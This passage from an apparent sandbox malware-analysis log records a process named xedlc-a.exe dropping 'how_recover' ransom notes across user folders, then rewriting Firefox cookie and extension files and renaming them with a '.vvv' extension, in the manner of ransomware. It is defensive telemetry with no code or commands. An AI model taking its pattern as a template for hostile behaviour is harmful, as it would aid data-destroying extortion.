50183.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.html
50184.          processinfo:
50185.            pid: 1056
50186.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50187.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50188.            ads:
50189.          fid (ads:): 281474976778308
50190.          ntstatus: 0x0
50191.          CreateOptions: 0x60
50192.        file:
50193.          timestamp: 71761
50194.          mode: close
50195.          sequenceNumber: 985
50196.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.html
50197.          filesize: 9495
50198.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50199.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50200.          processinfo:
50201.            pid: 1056
50202.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50203.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50204.            ads:
50205.          fid (ads:): 281474976778308
50206.          ntstatus: 0x0
50207.          CreateOptions: 0x0
50208.        file:
50209.          timestamp: 71771
50210.          mode: created
50211.          sequenceNumber: 986
50212.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.txt
50213.          processinfo:
50214.            pid: 1056
50215.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50216.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50217.            ads:
50218.          fid (ads:): 281474976778309
50219.          ntstatus: 0x0
50220.          CreateOptions: 0x60
50221.        file:
50222.          timestamp: 71776
50223.          mode: close
50224.          sequenceNumber: 987
50225.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.txt
50226.          filesize: 2682
50227.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50228.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50229.          processinfo:
50230.            pid: 1056
50231.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50232.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50233.            ads:
50234.          fid (ads:): 281474976778309
50235.          ntstatus: 0x0
50236.          CreateOptions: 0x0
50237.        file:
50238.          timestamp: 71802
50239.          mode: created
50240.          sequenceNumber: 988
50241.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.html
50242.          processinfo:
50243.            pid: 1056
50244.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50246.            ads:
50247.          fid (ads:): 281474976778310
50248.          ntstatus: 0x0
50249.          CreateOptions: 0x60
50250.        file:
50251.          timestamp: 71810
50252.          mode: close
50253.          sequenceNumber: 989
50254.          value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.html
50255.          filesize: 9495
50256.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50257.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50258.          processinfo:
50259.            pid: 1056
50260.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50261.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50262.            ads:
50263.          fid (ads:): 281474976778310
50264.          ntstatus: 0x0
50265.          CreateOptions: 0x0
50266.        file:
50267.          timestamp: 71819
50268.          mode: created
50269.          sequenceNumber: 990
50270.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.txt
50271.          processinfo:
50272.            pid: 1056
50273.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50274.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50275.            ads:
50276.          fid (ads:): 281474976778311
50277.          ntstatus: 0x0
50278.          CreateOptions: 0x60
50279.        file:
50280.          timestamp: 71824
50281.          mode: close
50282.          sequenceNumber: 991
50283.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.txt
50284.          filesize: 2682
50285.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50286.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50287.          processinfo:
50288.            pid: 1056
50289.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50290.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50291.            ads:
50292.          fid (ads:): 281474976778311
50293.          ntstatus: 0x0
50294.          CreateOptions: 0x0
50295.        file:
50296.          timestamp: 71831
50297.          mode: created
50298.          sequenceNumber: 992
50299.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.html
50300.          processinfo:
50301.            pid: 1056
50302.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50303.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50304.            ads:
50305.          fid (ads:): 281474976778312
50306.          ntstatus: 0x0
50307.          CreateOptions: 0x60
50308.        file:
50309.          timestamp: 71837
50310.          mode: close
50311.          sequenceNumber: 993
50312.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.html
50313.          filesize: 9495
50314.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50315.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50316.          processinfo:
50317.            pid: 1056
50318.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50319.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50320.            ads:
50321.          fid (ads:): 281474976778312
50322.          ntstatus: 0x0
50323.          CreateOptions: 0x0
50324.        file:
50325.          timestamp: 71844
50326.          mode: created
50327.          sequenceNumber: 994
50328.          value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.txt
50329.          processinfo:
50330.            pid: 1056
50331.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50332.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50333.            ads:
50334.          fid (ads:): 281474976778313
50335.          ntstatus: 0x0
50336.          CreateOptions: 0x60
50337.        file:
50338.          timestamp: 71850
50339.          mode: close
50340.          sequenceNumber: 995
50341.          value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.txt
50342.          filesize: 2682
50343.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50344.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50345.          processinfo:
50346.            pid: 1056
50347.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50348.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50349.            ads:
50350.          fid (ads:): 281474976778313
50351.          ntstatus: 0x0
50352.          CreateOptions: 0x0
50353.        file:
50354.          timestamp: 71856
50355.          mode: created
50356.          sequenceNumber: 996
50357.          value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.html
50358.          processinfo:
50359.            pid: 1056
50360.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50361.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50362.            ads:
50363.          fid (ads:): 281474976778314
50364.          ntstatus: 0x0
50365.          CreateOptions: 0x60
50366.        file:
50367.          timestamp: 71862
50368.          mode: close
50369.          sequenceNumber: 997
50370.          value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.html
50371.          filesize: 9495
50372.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50373.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50374.          processinfo:
50375.            pid: 1056
50376.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50377.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50378.            ads:
50379.          fid (ads:): 281474976778314
50380.          ntstatus: 0x0
50381.          CreateOptions: 0x0
50382.        file:
50383.          timestamp: 71870
50384.          mode: created
50385.          sequenceNumber: 998
50386.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.txt
50387.          processinfo:
50388.            pid: 1056
50389.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50390.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50391.            ads:
50392.          fid (ads:): 281474976778315
50393.          ntstatus: 0x0
50394.          CreateOptions: 0x60
50395.        file:
50396.          timestamp: 71876
50397.          mode: close
50398.          sequenceNumber: 999
50399.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.txt
50400.          filesize: 2682
50401.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50402.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50403.          processinfo:
50404.            pid: 1056
50405.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50406.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50407.            ads:
50408.          fid (ads:): 281474976778315
50409.          ntstatus: 0x0
50410.          CreateOptions: 0x0
50411.        file:
50412.          timestamp: 71984
50413.          mode: created
50414.          sequenceNumber: 1000
50415.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.html
50416.          processinfo:
50417.            pid: 1056
50418.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50419.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50420.            ads:
50421.          fid (ads:): 281474976778316
50422.          ntstatus: 0x0
50423.          CreateOptions: 0x60
50424.        file:
50425.          timestamp: 71990
50426.          mode: close
50427.          sequenceNumber: 1001
50428.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.html
50429.          filesize: 9495
50430.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50431.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50432.          processinfo:
50433.            pid: 1056
50434.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50435.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50436.            ads:
50437.          fid (ads:): 281474976778316
50438.          ntstatus: 0x0
50439.          CreateOptions: 0x0
50440.        file:
50441.          timestamp: 71997
50442.          mode: created
50443.          sequenceNumber: 1002
50444.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.txt
50445.          processinfo:
50446.            pid: 1056
50447.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50448.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50449.            ads:
50450.          fid (ads:): 281474976778317
50451.          ntstatus: 0x0
50452.          CreateOptions: 0x60
50453.        file:
50454.          timestamp: 72002
50455.          mode: close
50456.          sequenceNumber: 1003
50457.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.txt
50458.          filesize: 2682
50459.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50460.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50461.          processinfo:
50462.            pid: 1056
50463.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50464.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50465.            ads:
50466.          fid (ads:): 281474976778317
50467.          ntstatus: 0x0
50468.          CreateOptions: 0x0
50469.        file:
50470.          timestamp: 72009
50471.          mode: created
50472.          sequenceNumber: 1004
50473.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.html
50474.          processinfo:
50475.            pid: 1056
50476.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50477.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50478.            ads:
50479.          fid (ads:): 281474976778318
50480.          ntstatus: 0x0
50481.          CreateOptions: 0x60
50482.        file:
50483.          timestamp: 72014
50484.          mode: close
50485.          sequenceNumber: 1005
50486.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.html
50487.          filesize: 9495
50488.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50489.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50490.          processinfo:
50491.            pid: 1056
50492.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50493.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50494.            ads:
50495.          fid (ads:): 281474976778318
50496.          ntstatus: 0x0
50497.          CreateOptions: 0x0
50498.        file:
50499.          timestamp: 72021
50500.          mode: created
50501.          sequenceNumber: 1006
50502.          value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.txt
50503.          processinfo:
50504.            pid: 1056
50505.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50506.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50507.            ads:
50508.          fid (ads:): 281474976778319
50509.          ntstatus: 0x0
50510.          CreateOptions: 0x60
50511.        file:
50512.          timestamp: 72027
50513.          mode: close
50514.          sequenceNumber: 1007
50515.          value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.txt
50516.          filesize: 2682
50517.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50518.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50519.          processinfo:
50520.            pid: 1056
50521.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50522.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50523.            ads:
50524.          fid (ads:): 281474976778319
50525.          ntstatus: 0x0
50526.          CreateOptions: 0x0
50527.        apicall:
50528.          timestamp: 72329
50529.          repeat: 70
50530.          sequenceNumber: 1008
50531.          processinfo:
50532.            pid: 1056
50533.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50535.          dllname: kernel32.dll
50536.          apiname: Sleep
50537.          address: 0x0041ed5b
50538.        file:
50539.          timestamp: 72334
50540.          mode: created
50541.          sequenceNumber: 1009
50542.          value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.html
50543.          processinfo:
50544.            pid: 1056
50545.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50547.            ads:
50548.          fid (ads:): 281474976778320
50549.          ntstatus: 0x0
50550.          CreateOptions: 0x60
50551.        file:
50552.          timestamp: 72339
50553.          mode: close
50554.          sequenceNumber: 1010
50555.          value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.html
50556.          filesize: 9495
50557.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50558.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50559.          processinfo:
50560.            pid: 1056
50561.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50562.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50563.            ads:
50564.          fid (ads:): 281474976778320
50565.          ntstatus: 0x0
50566.          CreateOptions: 0x0
50567.        file:
50568.          timestamp: 72348
50569.          mode: created
50570.          sequenceNumber: 1011
50571.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.txt
50572.          processinfo:
50573.            pid: 1056
50574.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50576.            ads:
50577.          fid (ads:): 281474976778321
50578.          ntstatus: 0x0
50579.          CreateOptions: 0x60
50580.        file:
50581.          timestamp: 72354
50582.          mode: close
50583.          sequenceNumber: 1012
50584.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.txt
50585.          filesize: 2682
50586.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50587.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50588.          processinfo:
50589.            pid: 1056
50590.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50592.            ads:
50593.          fid (ads:): 281474976778321
50594.          ntstatus: 0x0
50595.          CreateOptions: 0x0
50596.        file:
50597.          timestamp: 72362
50598.          mode: created
50599.          sequenceNumber: 1013
50600.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.html
50601.          processinfo:
50602.            pid: 1056
50603.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50604.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50605.            ads:
50606.          fid (ads:): 281474976778322
50607.          ntstatus: 0x0
50608.          CreateOptions: 0x60
50609.        file:
50610.          timestamp: 72396
50611.          mode: close
50612.          sequenceNumber: 1014
50613.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.html
50614.          filesize: 9495
50615.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50616.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50617.          processinfo:
50618.            pid: 1056
50619.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50621.            ads:
50622.          fid (ads:): 281474976778322
50623.          ntstatus: 0x0
50624.          CreateOptions: 0x0
50625.        file:
50626.          timestamp: 72403
50627.          mode: created
50628.          sequenceNumber: 1015
50629.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.txt
50630.          processinfo:
50631.            pid: 1056
50632.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50633.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50634.            ads:
50635.          fid (ads:): 281474976778323
50636.          ntstatus: 0x0
50637.          CreateOptions: 0x60
50638.        file:
50639.          timestamp: 72408
50640.          mode: close
50641.          sequenceNumber: 1016
50642.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.txt
50643.          filesize: 2682
50644.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50645.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50646.          processinfo:
50647.            pid: 1056
50648.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50649.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50650.            ads:
50651.          fid (ads:): 281474976778323
50652.          ntstatus: 0x0
50653.          CreateOptions: 0x0
50654.        file:
50655.          timestamp: 72434
50656.          mode: created
50657.          sequenceNumber: 1017
50658.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.html
50659.          processinfo:
50660.            pid: 1056
50661.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50662.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50663.            ads:
50664.          fid (ads:): 281474976778324
50665.          ntstatus: 0x0
50666.          CreateOptions: 0x60
50667.        file:
50668.          timestamp: 72440
50669.          mode: close
50670.          sequenceNumber: 1018
50671.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.html
50672.          filesize: 9495
50673.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50674.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50675.          processinfo:
50676.            pid: 1056
50677.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50678.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50679.            ads:
50680.          fid (ads:): 281474976778324
50681.          ntstatus: 0x0
50682.          CreateOptions: 0x0
50683.        file:
50684.          timestamp: 72448
50685.          mode: created
50686.          sequenceNumber: 1019
50687.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.txt
50688.          processinfo:
50689.            pid: 1056
50690.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50691.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50692.            ads:
50693.          fid (ads:): 281474976778325
50694.          ntstatus: 0x0
50695.          CreateOptions: 0x60
50696.        file:
50697.          timestamp: 72454
50698.          mode: close
50699.          sequenceNumber: 1020
50700.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.txt
50701.          filesize: 2682
50702.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50703.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50704.          processinfo:
50705.            pid: 1056
50706.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50707.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50708.            ads:
50709.          fid (ads:): 281474976778325
50710.          ntstatus: 0x0
50711.          CreateOptions: 0x0
50712.        file:
50713.          timestamp: 72461
50714.          mode: created
50715.          sequenceNumber: 1021
50716.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.html
50717.          processinfo:
50718.            pid: 1056
50719.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50720.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50721.            ads:
50722.          fid (ads:): 281474976778326
50723.          ntstatus: 0x0
50724.          CreateOptions: 0x60
50725.        file:
50726.          timestamp: 72468
50727.          mode: close
50728.          sequenceNumber: 1022
50729.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.html
50730.          filesize: 9495
50731.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50732.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50733.          processinfo:
50734.            pid: 1056
50735.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50736.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50737.            ads:
50738.          fid (ads:): 281474976778326
50739.          ntstatus: 0x0
50740.          CreateOptions: 0x0
50741.        file:
50742.          timestamp: 72479
50743.          mode: created
50744.          sequenceNumber: 1023
50745.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.txt
50746.          processinfo:
50747.            pid: 1056
50748.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50749.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50750.            ads:
50751.          fid (ads:): 281474976778327
50752.          ntstatus: 0x0
50753.          CreateOptions: 0x60
50754.        file:
50755.          timestamp: 72486
50756.          mode: close
50757.          sequenceNumber: 1024
50758.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.txt
50759.          filesize: 2682
50760.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50761.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50762.          processinfo:
50763.            pid: 1056
50764.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50766.            ads:
50767.          fid (ads:): 281474976778327
50768.          ntstatus: 0x0
50769.          CreateOptions: 0x0
50770.        file:
50771.          timestamp: 72503
50772.          mode: created
50773.          sequenceNumber: 1025
50774.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.html
50775.          processinfo:
50776.            pid: 1056
50777.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50778.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50779.            ads:
50780.          fid (ads:): 281474976778328
50781.          ntstatus: 0x0
50782.          CreateOptions: 0x60
50783.        file:
50784.          timestamp: 72510
50785.          mode: close
50786.          sequenceNumber: 1026
50787.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.html
50788.          filesize: 9495
50789.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50790.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50791.          processinfo:
50792.            pid: 1056
50793.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50794.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50795.            ads:
50796.          fid (ads:): 281474976778328
50797.          ntstatus: 0x0
50798.          CreateOptions: 0x0
50799.        file:
50800.          timestamp: 72518
50801.          mode: open
50802.          sequenceNumber: 1027
50803.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
50804.          filesize: 157
50805.          processinfo:
50806.            pid: 1056
50807.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50808.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50809.            ads:
50810.          fid (ads:): 562949953478846
50811.          ntstatus: 0x0
50812.          CreateOptions: 0x200000
50813.        file:
50814.          timestamp: 72537
50815.          mode: close
50816.          sequenceNumber: 1028
50817.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
50818.          filesize: 574
50819.          md5sum: 313389f8531ac24cf5485ce138b374dc
50820.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
50821.          processinfo:
50822.            pid: 1056
50823.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50824.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50825.            ads:
50826.          fid (ads:): 562949953478846
50827.          ntstatus: 0x0
50828.          CreateOptions: 0x0
50829.        file:
50830.          timestamp: 72550
50831.          mode: rename
50832.          sequenceNumber: 1029
50833.          filesize: 574
50834.          md5sum: 313389f8531ac24cf5485ce138b374dc
50835.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
50836.          processinfo:
50837.            pid: 1056
50838.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50839.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50840.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
50841.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt.vvv
50842.            ads:
50843.          fid (ads:): 562949953478846
50844.          ntstatus: 0x0
50845.          CreateOptions: 0x0
50846.        file:
50847.          timestamp: 72583
50848.          mode: open
50849.          sequenceNumber: 1030
50850.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
50851.          filesize: 5393
50852.          processinfo:
50853.            pid: 1056
50854.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50855.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50856.            ads:
50857.          fid (ads:): 562949953476264
50858.          ntstatus: 0x0
50859.          CreateOptions: 0x60
50860.        file:
50861.          timestamp: 72614
50862.          mode: close
50863.          sequenceNumber: 1031
50864.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
50865.          filesize: 5822
50866.          md5sum: 3e799e17a82a4e8a3595802266a8f066
50867.          sha1sum: 7080d12586517dcb6d9334ade726e160e835a55f
50868.          processinfo:
50869.            pid: 1056
50870.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50871.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50872.            ads:
50873.          fid (ads:): 562949953476264
50874.          ntstatus: 0x0
50875.          CreateOptions: 0x0
50876.        file:
50877.          timestamp: 72624
50878.          mode: rename
50879.          sequenceNumber: 1032
50880.          filesize: 5822
50881.          md5sum: 3e799e17a82a4e8a3595802266a8f066
50882.          sha1sum: 7080d12586517dcb6d9334ade726e160e835a55f
50883.          processinfo:
50884.            pid: 1056
50885.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50886.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50887.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
50888.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js.vvv
50889.            ads:
50890.          fid (ads:): 562949953476264
50891.          ntstatus: 0x0
50892.          CreateOptions: 0x0
50893.        file:
50894.          timestamp: 72647
50895.          mode: open
50896.          sequenceNumber: 1033
50897.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
50898.          filesize: 19915
50899.          processinfo:
50900.            pid: 1056
50901.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50902.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50903.            ads:
50904.          fid (ads:): 281474976765892
50905.          ntstatus: 0x0
50906.          CreateOptions: 0x60
50907.        file:
50908.          timestamp: 72673
50909.          mode: close
50910.          sequenceNumber: 1034
50911.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
50912.          filesize: 20334
50913.          md5sum: 1ce612d9b1a3f15eebd0f2012d8b901f
50914.          sha1sum: b33e755531741122dcebeb0dc22386de29ab6a4a
50915.          processinfo:
50916.            pid: 1056
